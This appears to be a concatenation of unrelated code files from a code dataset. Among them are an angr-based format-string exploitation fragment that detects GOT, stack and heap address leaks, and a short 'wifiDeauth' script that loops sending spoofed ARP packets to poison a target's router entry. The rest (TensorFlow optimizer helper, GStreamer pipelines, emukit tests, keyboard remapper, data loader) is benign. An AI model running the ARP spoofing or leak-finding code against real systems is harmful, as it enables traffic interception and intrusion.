# If we can constrain it all in one go, then let's do it!
if state.solver.satisfiable(
extra_constraints=[total_region == total_format[:length]]
):
log.info("Can constrain it all, let's go!")
state.add_constraints(total_region == total_format[:length])
return
for i in tqdm.tqdm(range(length), total=length, desc="Constraining"):
strValIndex = i % len(strVal)
curr_byte = self.state.memory.load(loc + i, 1)
if state.solver.satisfiable(
extra_constraints=[curr_byte == strVal[strValIndex]]
):
state.add_constraints(curr_byte == strVal[strValIndex])
else:
log.info(
"[~] Byte {} not constrained to {}".format(i, strVal[strValIndex])
)
def run(self, _, fmt):
if not self.checkExploitable(fmt):
return super(type(self), self).run(fmt)
class printf_leak_detect(angr.procedures.libc.printf.printf):
IS_FUNCTION = True
format_index = 0
"""
Checks userinput arg
"""
def __init__(self, format_index):
# Set user input index for different
# printf types
self.format_index = format_index
super(type(self), self).__init__()
def check_for_leak(self, fmt):
bits = self.state.arch.bits
load_len = int(bits / 8)
max_read_len = 1024
"""
For each value passed to printf
Check to see if there are any symbolic bytes
Passed in that we control
"""
state = self.state
p = self.state.project
elf = ELF(state.project.filename)
fmt_str = self._parse(fmt)
for component in fmt_str.components:
# We only want format specifiers
if (
isinstance(component, bytes)
or isinstance(component, str)
or isinstance(component, claripy.ast.BV)
):
continue
printf_arg = component
fmt_spec = component
i_val = self.va_arg("void*")
c_val = int(state.solver.eval(i_val))
c_val &= (1 << (fmt_spec.size * 8)) - 1
if fmt_spec.signed and (c_val & (1 << ((fmt_spec.size * 8) - 1))):
c_val -= 1 << fmt_spec.size * 8
if fmt_spec.spec_type in (b"d", b"i"):
s_val = str(c_val)
elif fmt_spec.spec_type == b"u":
s_val = str(c_val)
elif fmt_spec.spec_type == b"c":
s_val = chr(c_val & 0xFF)
elif fmt_spec.spec_type == b"x":
s_val = hex(c_val)[2:]
elif fmt_spec.spec_type == b"o":
s_val = oct(c_val)[2:]
elif fmt_spec.spec_type == b"p":
s_val = hex(c_val)
else:
log.warning("Unimplemented format specifier '%s'" % fmt_spec.spec_type)
continue
if isinstance(fmt_spec.length_spec, int):
s_val = s_val.rjust(fmt_spec.length_spec, fmt_spec.pad_chr)
var_addr = c_val
# Are any pointers GOT addresses?
for name, addr in elf.got.items():
if var_addr == addr:
log.info("[+] Printf leaked GOT {}".format(name))
state.globals["leaked_type"] = "function"
state.globals["leaked_func"] = name
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
return True
# Heap and stack addrs should be in a heap or stack
# segment, but angr doesn't map those segments so the
# below call will not work
# found_obj = p.loader.find_segment_containing(var_addr)
# Check for stack address leak
# So we have a dumb check to see if it's a stack addr
stack_ptr = state.solver.eval(state.regs.sp)
var_addr_mask = var_addr >> 28
stack_ptr_mask = stack_ptr >> 28
if var_addr_mask == stack_ptr_mask:
log.info("[+] Leaked a stack addr : {}".format(hex(var_addr)))
state.globals["leaked_type"] = "stack_address"
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
input_bytes = get_trimmed_input(user_input, state)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
# Check tracked malloc addrs
if "stored_malloc" in self.state.globals.keys():
for addr in self.state.globals["stored_malloc"]:
if addr == var_addr:
log.info("[+] Leaked a heap addr : {}".format(hex(var_addr)))
state.globals["leaked_type"] = "heap_address"
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
def run(self, fmt):
"""
Iterating over the va_args checking for a leak
will consume them and prevent us from printing
normally, so we need to make a copy.
"""
va_args_copy = copy.deepcopy(self)
va_args_copy.check_for_leak(fmt)
return super(type(self), self).run(fmt)
|
StarcoderdataPython
|
11300555
|
<gh_stars>1-10
# Import tensorflow with correct log level
import inceptionkeynet
__log_levels = { 'DEBUG': '0', 'INFO': '1', 'WARNING': '2' }
if inceptionkeynet.TERMINAL_LOG_LEVEL in __log_levels:
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = __log_levels[inceptionkeynet.TERMINAL_LOG_LEVEL]
import tensorflow as tf
from inceptionkeynet.machine_learning.__hyperparameters import Hyperparameters
def get_optimizer(hyperparameters: Hyperparameters) -> tf.keras.optimizers.Optimizer:
optimizer = hyperparameters[Hyperparameters.OPTIMIZER].value
if optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(learning_rate=0.001, momentum=.9)
optimizer = tf.keras.optimizers.get(optimizer)
if not hyperparameters[Hyperparameters.LEARNING_RATE].value is None:
optimizer.learning_rate = hyperparameters[Hyperparameters.LEARNING_RATE].value
return optimizer
|
StarcoderdataPython
|
1845781
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gst import *
def decoded_file_src(filename):
return [
Source('file', location=filename),
Filter('decodebin'),
]
def v4l2_src(fmt):
return [
Source('v4l2', device=fmt.device),
Caps('video/x-raw', format=fmt.pixel, width=fmt.size.width, height=fmt.size.height,
framerate='%d/%d' % fmt.framerate),
]
def display_sink():
return Sink('glsvgoverlay', name='glsink'),
def h264_sink():
return Sink('app', name='h264sink', emit_signals=True, max_buffers=1, drop=False, sync=False)
def inference_pipeline(layout, stillimage=False):
size = max_inner_size(layout.render_size, layout.inference_size)
return [
Filter('glfilterbin', filter='glbox'),
Caps('video/x-raw', format='RGB', width=layout.inference_size.width, height=layout.inference_size.height),
Sink('app', name='appsink', emit_signals=True, max_buffers=1, drop=True, sync=False),
]
# Display
def image_display_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('imagefreeze'),
Caps('video/x-raw', framerate='30/1'),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
def video_display_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
def camera_display_pipeline(fmt, layout):
return (
[v4l2_src(fmt),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad(name='t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
# Headless
def image_headless_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('imagefreeze'),
Filter('glupload'),
inference_pipeline(layout)],
)
def video_headless_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('glupload'),
inference_pipeline(layout)],
)
def camera_headless_pipeline(fmt, layout):
return (
[v4l2_src(fmt),
Filter('glupload'),
inference_pipeline(layout)],
)
# Streaming
def video_streaming_pipeline(filename, layout):
return (
[Source('file', location=filename),
Filter('qtdemux'),
Tee(name='t')],
[Pad('t'),
Queue(max_size_buffers=1),
Filter('h264parse'),
Caps('video/x-h264', stream_format='byte-stream', alignment='nal'),
h264_sink()],
[Pad('t'),
Queue(max_size_buffers=1),
Filter('decodebin'),
inference_pipeline(layout)],
)
def camera_streaming_pipeline(fmt, profile, bitrate, layout):
return (
[v4l2_src(fmt), Tee(name='t')],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
Filter('videoconvert'),
Filter('x264enc',
speed_preset='ultrafast',
tune='zerolatency',
threads=4,
key_int_max=5,
bitrate=int(bitrate / 1000), # kbit per second.
aud=False),
Caps('video/x-h264', profile=profile),
Filter('h264parse'),
Caps('video/x-h264', stream_format='byte-stream', alignment='nal'),
h264_sink()],
[Pad('t'),
Queue(),
inference_pipeline(layout)],
)
|
StarcoderdataPython
|
3490927
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
from math import isclose
import numpy as np
import pytest
from emukit.quadrature.kernels.integration_measures import IsotropicGaussianMeasure, UniformMeasure
REL_TOL = 1e-5
ABS_TOL = 1e-4
def test_uniform_measure_shapes():
N = 5
bounds = [(-1, 1), (0, 2), (1.3, 5.0)]
D = len(bounds)
x = np.reshape(np.random.randn(D * N), [N, D])
measure = UniformMeasure(bounds)
bounds = measure.get_box()
assert len(bounds) == D
assert len(bounds[0]) == 2
res = measure.compute_density(x)
assert res.shape == (N,)
# sampling capabilities
assert measure.can_sample
res = measure.get_samples(N)
assert res.shape == (N, D)
def test_uniform_measure_wrong_bounds():
bounds = [(-1, 1), (3, 2), (1.3, 5.0)]
with pytest.raises(ValueError):
UniformMeasure(bounds)
def test_uniform_measure_gradients():
measure_bounds = [(-1, 2), (0, 1)]
measure = UniformMeasure(bounds=measure_bounds)
N = 3
D = len(measure_bounds)
x = np.reshape(np.random.randn(D * N), [N, D])
_check_grad(measure, x)
def test_iso_gauss_measure_shapes():
D = 4
N = 5
x = np.reshape(np.random.randn(D * N), [N, D])
measure = IsotropicGaussianMeasure(mean=np.ones(D), variance=1.0)
bounds = measure.get_box()
assert len(bounds) == D
assert len(bounds[0]) == 2
assert measure.num_dimensions == D
res = measure.compute_density(x)
assert res.shape == (N,)
# sampling capabilities
assert measure.can_sample
res = measure.get_samples(N)
assert res.shape == (N, D)
def test_iso_gauss_measure_invalid_input():
wrong_variance = -2.0
mean_wrong_dim = np.ones([3, 1])
mean_wrong_type = 0.0
with pytest.raises(ValueError):
IsotropicGaussianMeasure(mean=np.ones(3), variance=wrong_variance)
with pytest.raises(TypeError):
IsotropicGaussianMeasure(mean=mean_wrong_type, variance=1.0)
with pytest.raises(ValueError):
IsotropicGaussianMeasure(mean=mean_wrong_dim, variance=1.0)
def test_iso_gauss_measure_gradients():
D = 2
measure = IsotropicGaussianMeasure(mean=np.random.randn(D), variance=np.random.randn() ** 2)
N = 3
x = np.reshape(np.random.randn(D * N), [N, D])
_check_grad(measure, x)
def _compute_numerical_gradient(m, x, eps=1e-6):
f = m.compute_density(x)
grad = m.compute_density_gradient(x)
grad_num = np.zeros(grad.shape)
for d in range(x.shape[1]):
x_tmp = x.copy()
x_tmp[:, d] = x_tmp[:, d] + eps
f_tmp = m.compute_density(x_tmp)
grad_num_d = (f_tmp - f) / eps
grad_num[:, d] = grad_num_d
return grad, grad_num
def _check_grad(aq, x):
grad, grad_num = _compute_numerical_gradient(aq, x)
isclose_all = 1 - np.array(
[
isclose(grad[i, j], grad_num[i, j], rel_tol=REL_TOL, abs_tol=ABS_TOL)
for i in range(grad.shape[0])
for j in range(grad.shape[1])
]
)
assert isclose_all.sum() == 0
|
StarcoderdataPython
|
273832
|
#!/usr/bin/env python
import asyncio
import enum
import logging
import signal
from collections import defaultdict
import evdev
import pyudev
REMAPPED_PREFIX = '[remapped]'
class AlreadyRemappedError(Exception):
pass
class VirtualModifierState(enum.Enum):
RELEASED = enum.auto()
PRESSED_SILENT = enum.auto()
PRESSED_NOISY = enum.auto()
class VirtualModifier():
def __init__(self, keyboard, code):
self._keyboard = keyboard
self.code = code
self._pressed_keys = []
self._state = VirtualModifierState.RELEASED
self._previous_state = self._state
self._callbacks = []
@property
def active(self):
return self._state != VirtualModifierState.RELEASED
@property
def noisy(self):
return self._state == VirtualModifierState.PRESSED_NOISY
@property
def repeating_key(self):
if self._state == VirtualModifierState.PRESSED_NOISY:
self._pressed_keys[0]
else:
None
def add_callback(self, callback):
self._callbacks.append(callback)
def press(self, key):
if key not in self._pressed_keys:
self._pressed_keys.append(key)
if len(self._pressed_keys) >= 2:
self.trigger_noisy()
def release(self, key):
self._pressed_keys.remove(key)
if not self._pressed_keys:
self._state = VirtualModifierState.RELEASED
def trigger_silent(self):
if self._pressed_keys and self._state == VirtualModifierState.RELEASED:
self._state = VirtualModifierState.PRESSED_SILENT
self._trigger()
def trigger_noisy(self):
if not self.code:
self.trigger_silent()
return
if self._pressed_keys and self._state == VirtualModifierState.RELEASED:
self._state = VirtualModifierState.PRESSED_NOISY
self._trigger()
elif self._state == VirtualModifierState.PRESSED_SILENT:
self._state = VirtualModifierState.PRESSED_NOISY
def _trigger(self):
for callback in self._callbacks:
callback()
def flush_state_change(self, sync_event):
noisy = self._state == VirtualModifierState.PRESSED_NOISY
previous_noisy = self._previous_state == VirtualModifierState.PRESSED_NOISY
if noisy and not previous_noisy:
self._keyboard.write_event(
evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self.code, 1))
elif not noisy and previous_noisy:
self._keyboard.write_event(
evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self.code, 0))
self._previous_state = self._state
class Key:
def __init__(self, keyboard):
self._keyboard = keyboard
def process_event(self, event):
return True
def flush_state_change(self, sync_event):
pass
def flush_event(self, event):
self._keyboard.write_event(event)
class TriggerKey:
def __init__(self, key, *callbacks):
self._key = key
self._callbacks = callbacks
def _trigger(self):
for callback in self._callbacks:
callback()
def process_event(self, event):
if event.value == 1:
self._trigger()
return self._key.process_event(event)
def flush_state_change(self, sync_event):
self._key.flush_state_change(sync_event)
def flush_event(self, event):
self._key.flush_event(event)
def __getattr__(self, name):
return self._key.__getattribute__(name)
class VirtualModifierKey(Key):
def __init__(self, keyboard, virtual_modifier, **kwargs):
super().__init__(keyboard, **kwargs)
self._virtual_modifier = virtual_modifier
def process_event(self, event):
super().process_event(event)
if event.value == 0:
self._virtual_modifier.release(self)
return False
elif event.value == 1:
self._virtual_modifier.press(self)
return False
else:
return self._virtual_modifier.noisy
def flush_event(self, event):
if event.value == 2 and self._virtual_modifier.repeating_key is self:
event.code = self._virtual_modifier.code
self._keyboard.write_event(event)
class ModifierKey(VirtualModifierKey):
def __init__(self, keyboard, virtual_modifier, silent=False):
super().__init__(keyboard, virtual_modifier)
self._silent = silent
def process_event(self, event):
ret = super().process_event(event)
if event.value == 1:
if self._silent:
self._virtual_modifier.trigger_silent()
else:
self._virtual_modifier.trigger_noisy()
return ret
class OnReleaseState(enum.Enum):
RELEASED = enum.auto()
PRESSED_SINGLE = enum.auto()
PRESSED_SILENT = enum.auto()
class OnReleaseKey(Key):
def __init__(self, keyboard, extra_code, silence_modifier=None, callbacks=None, **kwargs):
super().__init__(keyboard, **kwargs)
self._extra_code = extra_code
self._silence_modifier = silence_modifier
if silence_modifier:
silence_modifier.add_callback(self.silence_release)
self._callbacks = callbacks
self._state = OnReleaseState.RELEASED
self._previous_state = self._state
def silence_release(self):
if self._state == OnReleaseState.PRESSED_SINGLE:
self._state = OnReleaseState.PRESSED_SILENT
def process_event(self, event):
if event.value == 0:
self._state = OnReleaseState.RELEASED
if self._previous_state == OnReleaseState.PRESSED_SINGLE:
if self._callbacks:
for callback in self._callbacks:
callback()
if event.value == 1:
if self._silence_modifier and self._silence_modifier.active:
self._state = OnReleaseState.PRESSED_SILENT
else:
self._state = OnReleaseState.PRESSED_SINGLE
return True
def flush_state_change(self, sync_event):
if self._previous_state == OnReleaseState.PRESSED_SINGLE and \
self._state == OnReleaseState.RELEASED:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._extra_code, 1)
self._keyboard.write_event(event)
event.value = 0
self._keyboard.write_event(event)
self._previous_state = self._state
class OnQuickReleaseKey(OnReleaseKey):
def __init__(self, keyboard, extra_code, delay=None, **kwargs):
super().__init__(keyboard, extra_code, **kwargs)
def process_event(self, event):
ret = super().process_event(event)
if event.value == 2:
self.silence_release()
return ret
class SingleOrModifierKey(VirtualModifierKey, OnReleaseKey):
def __init__(self, keyboard, single_code, virtual_modifier, **kwargs):
super().__init__(keyboard, extra_code=single_code,
virtual_modifier=virtual_modifier,
silence_modifier=virtual_modifier, **kwargs)
class RemapKey(Key):
def __init__(self, keyboard, code):
super().__init__(keyboard)
self._code = code
def flush_event(self, event):
event.code = self._code
super().flush_event(event)
class ModKey():
def __init__(self, normal_key, virtual_modifier, modified_key):
self._normal_key = normal_key
self._virtual_modifier = virtual_modifier
self._modified_key = modified_key
self._active_key = None
self._releasing = False
self._wants_release_event = False
def process_event(self, event):
if self._releasing:
return False
if event.value == 0:
self._releasing = True
self._wants_release_event = self._active_key.process_event(event)
return True
elif event.value == 1:
if not self._active_key:
self._virtual_modifier.trigger_silent()
if self._virtual_modifier.active:
self._active_key = self._modified_key
else:
self._active_key = self._normal_key
if self._active_key:
return self._active_key.process_event(event)
else:
return False
def flush_state_change(self, sync_event):
if self._active_key:
self._active_key.flush_state_change(sync_event)
def flush_event(self, event):
if self._releasing and event.value == 0:
if self._active_key and self._wants_release_event:
self._active_key.flush_event(event)
self._wants_release_event = False
self._releasing = False
self._active_key = None
elif self._active_key:
self._active_key.flush_event(event)
def __getattr__(self, name):
return self._normal_key.__getattribute__(name)
class SecondTouchKey(OnQuickReleaseKey):
def __init__(self, keyboard, first_code, second_code, force_modifier=None, **kwargs):
super().__init__(keyboard, extra_code=first_code,
silence_modifier=force_modifier, **kwargs)
self._second_code = second_code
self._force_modifier = force_modifier
self._repeating = False
def process_event(self, event):
if event.value == 1 and self._force_modifier:
self._force_modifier.trigger_silent()
if self._force_modifier.active:
self._repeating = True
super().process_event(event)
return event.value == 2 and self._repeating
def flush_state_change(self, sync_event):
if self._state == OnReleaseState.PRESSED_SILENT and \
self._previous_state != OnReleaseState.PRESSED_SILENT:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._second_code, 1)
self._keyboard.write_event(event)
if not self._repeating:
event.value = 0
self._keyboard.write_event(event)
if self._state != OnReleaseState.PRESSED_SILENT and \
self._previous_state == OnReleaseState.PRESSED_SILENT and \
self._repeating:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._second_code, 0)
self._keyboard.write_event(event)
self._repeating = False
super().flush_state_change(sync_event)
class Keyboard:
def __init__(self, path):
self._logger = logging.getLogger(type(self).__qualname__)
self._device = evdev.InputDevice(path)
name = self._device.name
if name.startswith(REMAPPED_PREFIX):
self._device.close()
raise AlreadyRemappedError()
capabilities = defaultdict(set)
for ev_type, ev_codes in self._device.capabilities().items():
if ev_type != evdev.ecodes.EV_SYN and ev_type != evdev.ecodes.EV_FF:
capabilities[ev_type].update(ev_codes)
capabilities[evdev.ecodes.EV_KEY].update({
evdev.ecodes.KEY_ESC,
evdev.ecodes.KEY_COMPOSE,
evdev.ecodes.KEY_F13,
evdev.ecodes.KEY_F14,
evdev.ecodes.KEY_F15,
evdev.ecodes.KEY_F16,
evdev.ecodes.KEY_F17,
evdev.ecodes.KEY_F18,
evdev.ecodes.KEY_F19,
evdev.ecodes.KEY_F20,
evdev.ecodes.KEY_F21,
evdev.ecodes.KEY_F22,
evdev.ecodes.KEY_F23,
evdev.ecodes.KEY_F24,
evdev.ecodes.KEY_FILE,
evdev.ecodes.KEY_HOMEPAGE,
evdev.ecodes.KEY_CALC,
evdev.ecodes.KEY_CONFIG,
evdev.ecodes.KEY_PREVIOUSSONG,
evdev.ecodes.KEY_NEXTSONG,
evdev.ecodes.KEY_PLAYPAUSE,
evdev.ecodes.KEY_STOP,
evdev.ecodes.KEY_MUTE,
evdev.ecodes.KEY_VOLUMEDOWN,
evdev.ecodes.KEY_VOLUMEUP,
evdev.ecodes.KEY_PROG1,
evdev.ecodes.KEY_PROG2,
evdev.ecodes.KEY_SEARCH,
evdev.ecodes.KEY_BACK,
evdev.ecodes.KEY_FORWARD,
})
try:
self._uinput = evdev.UInput(
events=capabilities, name=f'{REMAPPED_PREFIX} {name}')
except:
self._device.close()
raise
self._logger = self._logger.getChild(name)
self._logger.info('Initialized at %s', path)
right_alt = VirtualModifier(self, evdev.ecodes.KEY_RIGHTALT)
fn = VirtualModifier(self, None)
self._virtual_modifiers = [right_alt, fn]
basic_key = Key(self)
left_meta = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_D, silence_modifier=right_alt),
right_alt.trigger_silent)
right_meta = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_F, silence_modifier=right_alt),
right_alt.trigger_silent)
left_alt = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_SEARCH, silence_modifier=right_alt),
right_alt.trigger_silent)
self._special_keys = {
evdev.ecodes.KEY_LEFTSHIFT: basic_key,
evdev.ecodes.KEY_RIGHTSHIFT: basic_key,
evdev.ecodes.KEY_LEFTCTRL: basic_key,
evdev.ecodes.KEY_RIGHTCTRL: basic_key,
evdev.ecodes.KEY_CAPSLOCK: SingleOrModifierKey(
self, evdev.ecodes.KEY_ESC, right_alt,
callbacks=[left_meta.silence_release, right_meta.silence_release]),
evdev.ecodes.KEY_LEFTALT: left_alt,
evdev.ecodes.KEY_RIGHTALT: SingleOrModifierKey(
self, evdev.ecodes.KEY_COMPOSE, right_alt,
callbacks=[left_meta.silence_release, right_meta.silence_release]),
evdev.ecodes.KEY_LEFTMETA: left_meta,
evdev.ecodes.KEY_RIGHTMETA: right_meta,
evdev.ecodes.KEY_MENU: ModifierKey(self, fn),
evdev.ecodes.KEY_COMPOSE: ModifierKey(self, fn),
evdev.ecodes.KEY_F1: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F13, evdev.ecodes.KEY_F1, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_FILE)),
evdev.ecodes.KEY_F2: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F14, evdev.ecodes.KEY_F2, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_HOMEPAGE)),
evdev.ecodes.KEY_F3: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F15, evdev.ecodes.KEY_F3, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_CALC)),
evdev.ecodes.KEY_F4: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F16, evdev.ecodes.KEY_F4, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_CONFIG)),
evdev.ecodes.KEY_F5: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F17, evdev.ecodes.KEY_F5, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_PREVIOUSSONG)),
evdev.ecodes.KEY_F6: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F18, evdev.ecodes.KEY_F6, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_NEXTSONG)),
evdev.ecodes.KEY_F7: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F19, evdev.ecodes.KEY_F7, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_PLAYPAUSE)),
evdev.ecodes.KEY_F8: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F20, evdev.ecodes.KEY_F8, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_STOP)),
evdev.ecodes.KEY_F9: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F21, evdev.ecodes.KEY_F9, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_MUTE)),
evdev.ecodes.KEY_F10: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F22, evdev.ecodes.KEY_F10, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_VOLUMEDOWN)),
evdev.ecodes.KEY_F11: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F23, evdev.ecodes.KEY_F11, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_VOLUMEUP)),
evdev.ecodes.KEY_F12: SecondTouchKey(
self, evdev.ecodes.KEY_F24, evdev.ecodes.KEY_F12, right_alt),
evdev.ecodes.KEY_SYSRQ: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG1), right_alt, basic_key),
evdev.ecodes.KEY_SCROLLLOCK: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG1), right_alt, basic_key),
evdev.ecodes.KEY_PAUSE: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG2), right_alt, basic_key),
evdev.ecodes.KEY_BREAK: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG2), right_alt, basic_key),
evdev.ecodes.KEY_LEFT: ModKey(
basic_key, right_alt, RemapKey(self, evdev.ecodes.KEY_BACK)),
evdev.ecodes.KEY_RIGHT: ModKey(
basic_key, right_alt, RemapKey(self, evdev.ecodes.KEY_FORWARD)),
}
self._default_key = TriggerKey(
basic_key, left_meta.silence_release, right_meta.silence_release,
left_alt.silence_release, right_alt.trigger_noisy)
self._backlog = []
self._await_later = []
async def process_events(self, interrupted):
try:
with self._device.grab_context():
async for event in self._device.async_read_loop():
self._process_event(event)
except asyncio.CancelledError:
pass
except OSError:
return
except:
interrupted.set()
raise
finally:
try:
self._uinput.close()
except asyncio.CancelledError | OSError:
pass
try:
self._device.close()
except asyncio.CancelledError | OSError:
pass
self._logger.info('Closed')
def _process_event(self, event):
if event.type == evdev.ecodes.EV_SYN:
for virtual_modifier in self._virtual_modifiers:
virtual_modifier.flush_state_change(event)
for key in self._special_keys.values():
key.flush_state_change(event)
for buffered_event in self._backlog:
buffered_event.sec = event.sec
buffered_event.usec = event.usec
self.get_key(buffered_event.code).flush_event(buffered_event)
self.write_event(event)
self._backlog.clear()
elif event.type == evdev.ecodes.EV_KEY:
if self.get_key(event.code).process_event(event):
self._backlog.append(event)
else:
self.write_event(event)
def get_key(self, code):
return self._special_keys.get(code, self._default_key)
def write_event(self, event):
self._logger.debug('out: %r', event)
self._uinput.write_event(event)
class KeyboardRemapper:
def __init__(self, interrupted):
self._logger = logging.getLogger(type(self).__qualname__)
self._interrupted = interrupted
self._devices = {}
self._context = pyudev.Context()
self._monitor = pyudev.Monitor.from_netlink(self._context)
self._monitor.filter_by('input')
async def start(self):
self._monitor.start()
keyboards = self._context.list_devices(
subsystem='input').match_property('ID_INPUT_KEYBOARD', True)
for device in keyboards:
self._add_device(device)
loop = asyncio.get_running_loop()
loop.add_reader(self._monitor.fileno(), self._poll_udev_event)
async def stop(self):
for task in self._devices.values():
task.cancel()
await asyncio.gather(*self._devices.values())
def _poll_udev_event(self):
device = self._monitor.poll()
action = device.action
if action == 'add' or action == 'online':
self._add_device(device)
elif action == 'remove' or action == 'offline':
self._remove_device(device)
elif action != 'change':
self._logger.warn(
f'Unknown action {action} from {device.device_path}')
def _add_device(self, device):
device_path = device.device_path
if device_path in self._devices:
return
device_node = device.device_node
if device_node is None or not evdev.util.is_device(device_node):
return
if self._is_keyboard(device):
try:
keyboard = Keyboard(device_node)
except AlreadyRemappedError:
return
except OSError:
self._logger.exception(
f'Cannot initialize {device_path} at {device_node}')
return
task = asyncio.create_task(keyboard.process_events(self._interrupted),
name=f'remap {device_path}')
self._devices[device_path] = task
def _is_keyboard(self, device):
try:
if not device.properties.asbool('ID_INPUT_KEYBOARD'):
return False
except KeyError:
return False
except UnicodeDecodeError | ValueError:
self._logger.exception(
f'{device.device_path} has malformed ID_INPUT_KEYBOARD property')
return False
try:
if device.properties.asbool('ID_INPUT_MOUSE'):
return False
except KeyError:
pass
except UnicodeDecodeError | ValueError:
self._logger.exception(
f'{device.device_path} has malformed ID_INPUT_MOUSE property')
return False
return True
def _remove_device(self, device):
task = self._devices.pop(device.device_path, None)
if task is not None:
task.cancel()
async def _timeout(timeout, interrupted):
try:
await asyncio.sleep(timeout)
interrupted.set()
except asyncio.CancelledError:
pass
async def main(timeout):
interrupted = asyncio.Event()
loop = asyncio.get_running_loop()
loop.add_signal_handler(signal.SIGINT, interrupted.set)
if timeout:
timeout_task = asyncio.create_task(_timeout(timeout, interrupted))
else:
timeout_task = None
keyboard_remapper = KeyboardRemapper(interrupted)
try:
await keyboard_remapper.start()
await interrupted.wait()
finally:
loop.remove_signal_handler(signal.SIGINT)
if timeout_task:
timeout_task.cancel()
await timeout_task
await keyboard_remapper.stop()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Remap keyboard input.')
parser.add_argument('-v', '--verbose', action='store_true',
help='verbose output')
parser.add_argument('-d', '--debug', action='store_true',
help='enable debugging')
parser.add_argument('-t', '--timeout', metavar='SECONDS', type=int,
help='exit after timeout instead of running indefinitely')
args = parser.parse_args()
timeout = args.timeout
if args.debug:
if timeout is None:
timeout = 1
log_level = logging.DEBUG
elif args.verbose:
log_level = logging.INFO
else:
log_level = logging.WARN
logging.basicConfig(level=log_level)
asyncio.run(main(timeout))
|
StarcoderdataPython
|
1781890
|
<reponame>sjhonatan/pentesting<filename>wifiDeauth.py
#!/usr/bin/python
#for python 2.7
from subprocess import check_output,call
import time
try:
from scapy.all import *
except:
print "Installation of scapy is necessary"
print "Ip addres of target"
ipTarget = ...
print "Ip addres of router"
router = ...
print "Mac addres of target"
macTarget= ...
packet = ARP()
packet.psrc = router
packet.pdst = ipTarget
while 1:
send(packet,verbose=0)
time.sleep(1)
|
StarcoderdataPython
|
57520
|
<reponame>momentoscope/hextofloader
"""
This module implements the flash data preprocessing class.
The raw hdf5 data is saved into parquet files and loaded as a pandas dataframe.
The class attributes are inherited by dataframeReader - a wrapper class.
"""
import os
from typing import cast
from pathlib import Path
from functools import reduce
from multiprocessing import Pool, cpu_count
from itertools import compress
import numpy as np
from pandas import Series, DataFrame, MultiIndex
import dask.dataframe as dd
import h5py
from hextofloader.config_parser import configParser
class FlashLoader(configParser):
"""
The class generates multiindexed multidimensional pandas dataframes
from the new FLASH dataformat resolved by both macro and microbunches
alongside electrons.
"""
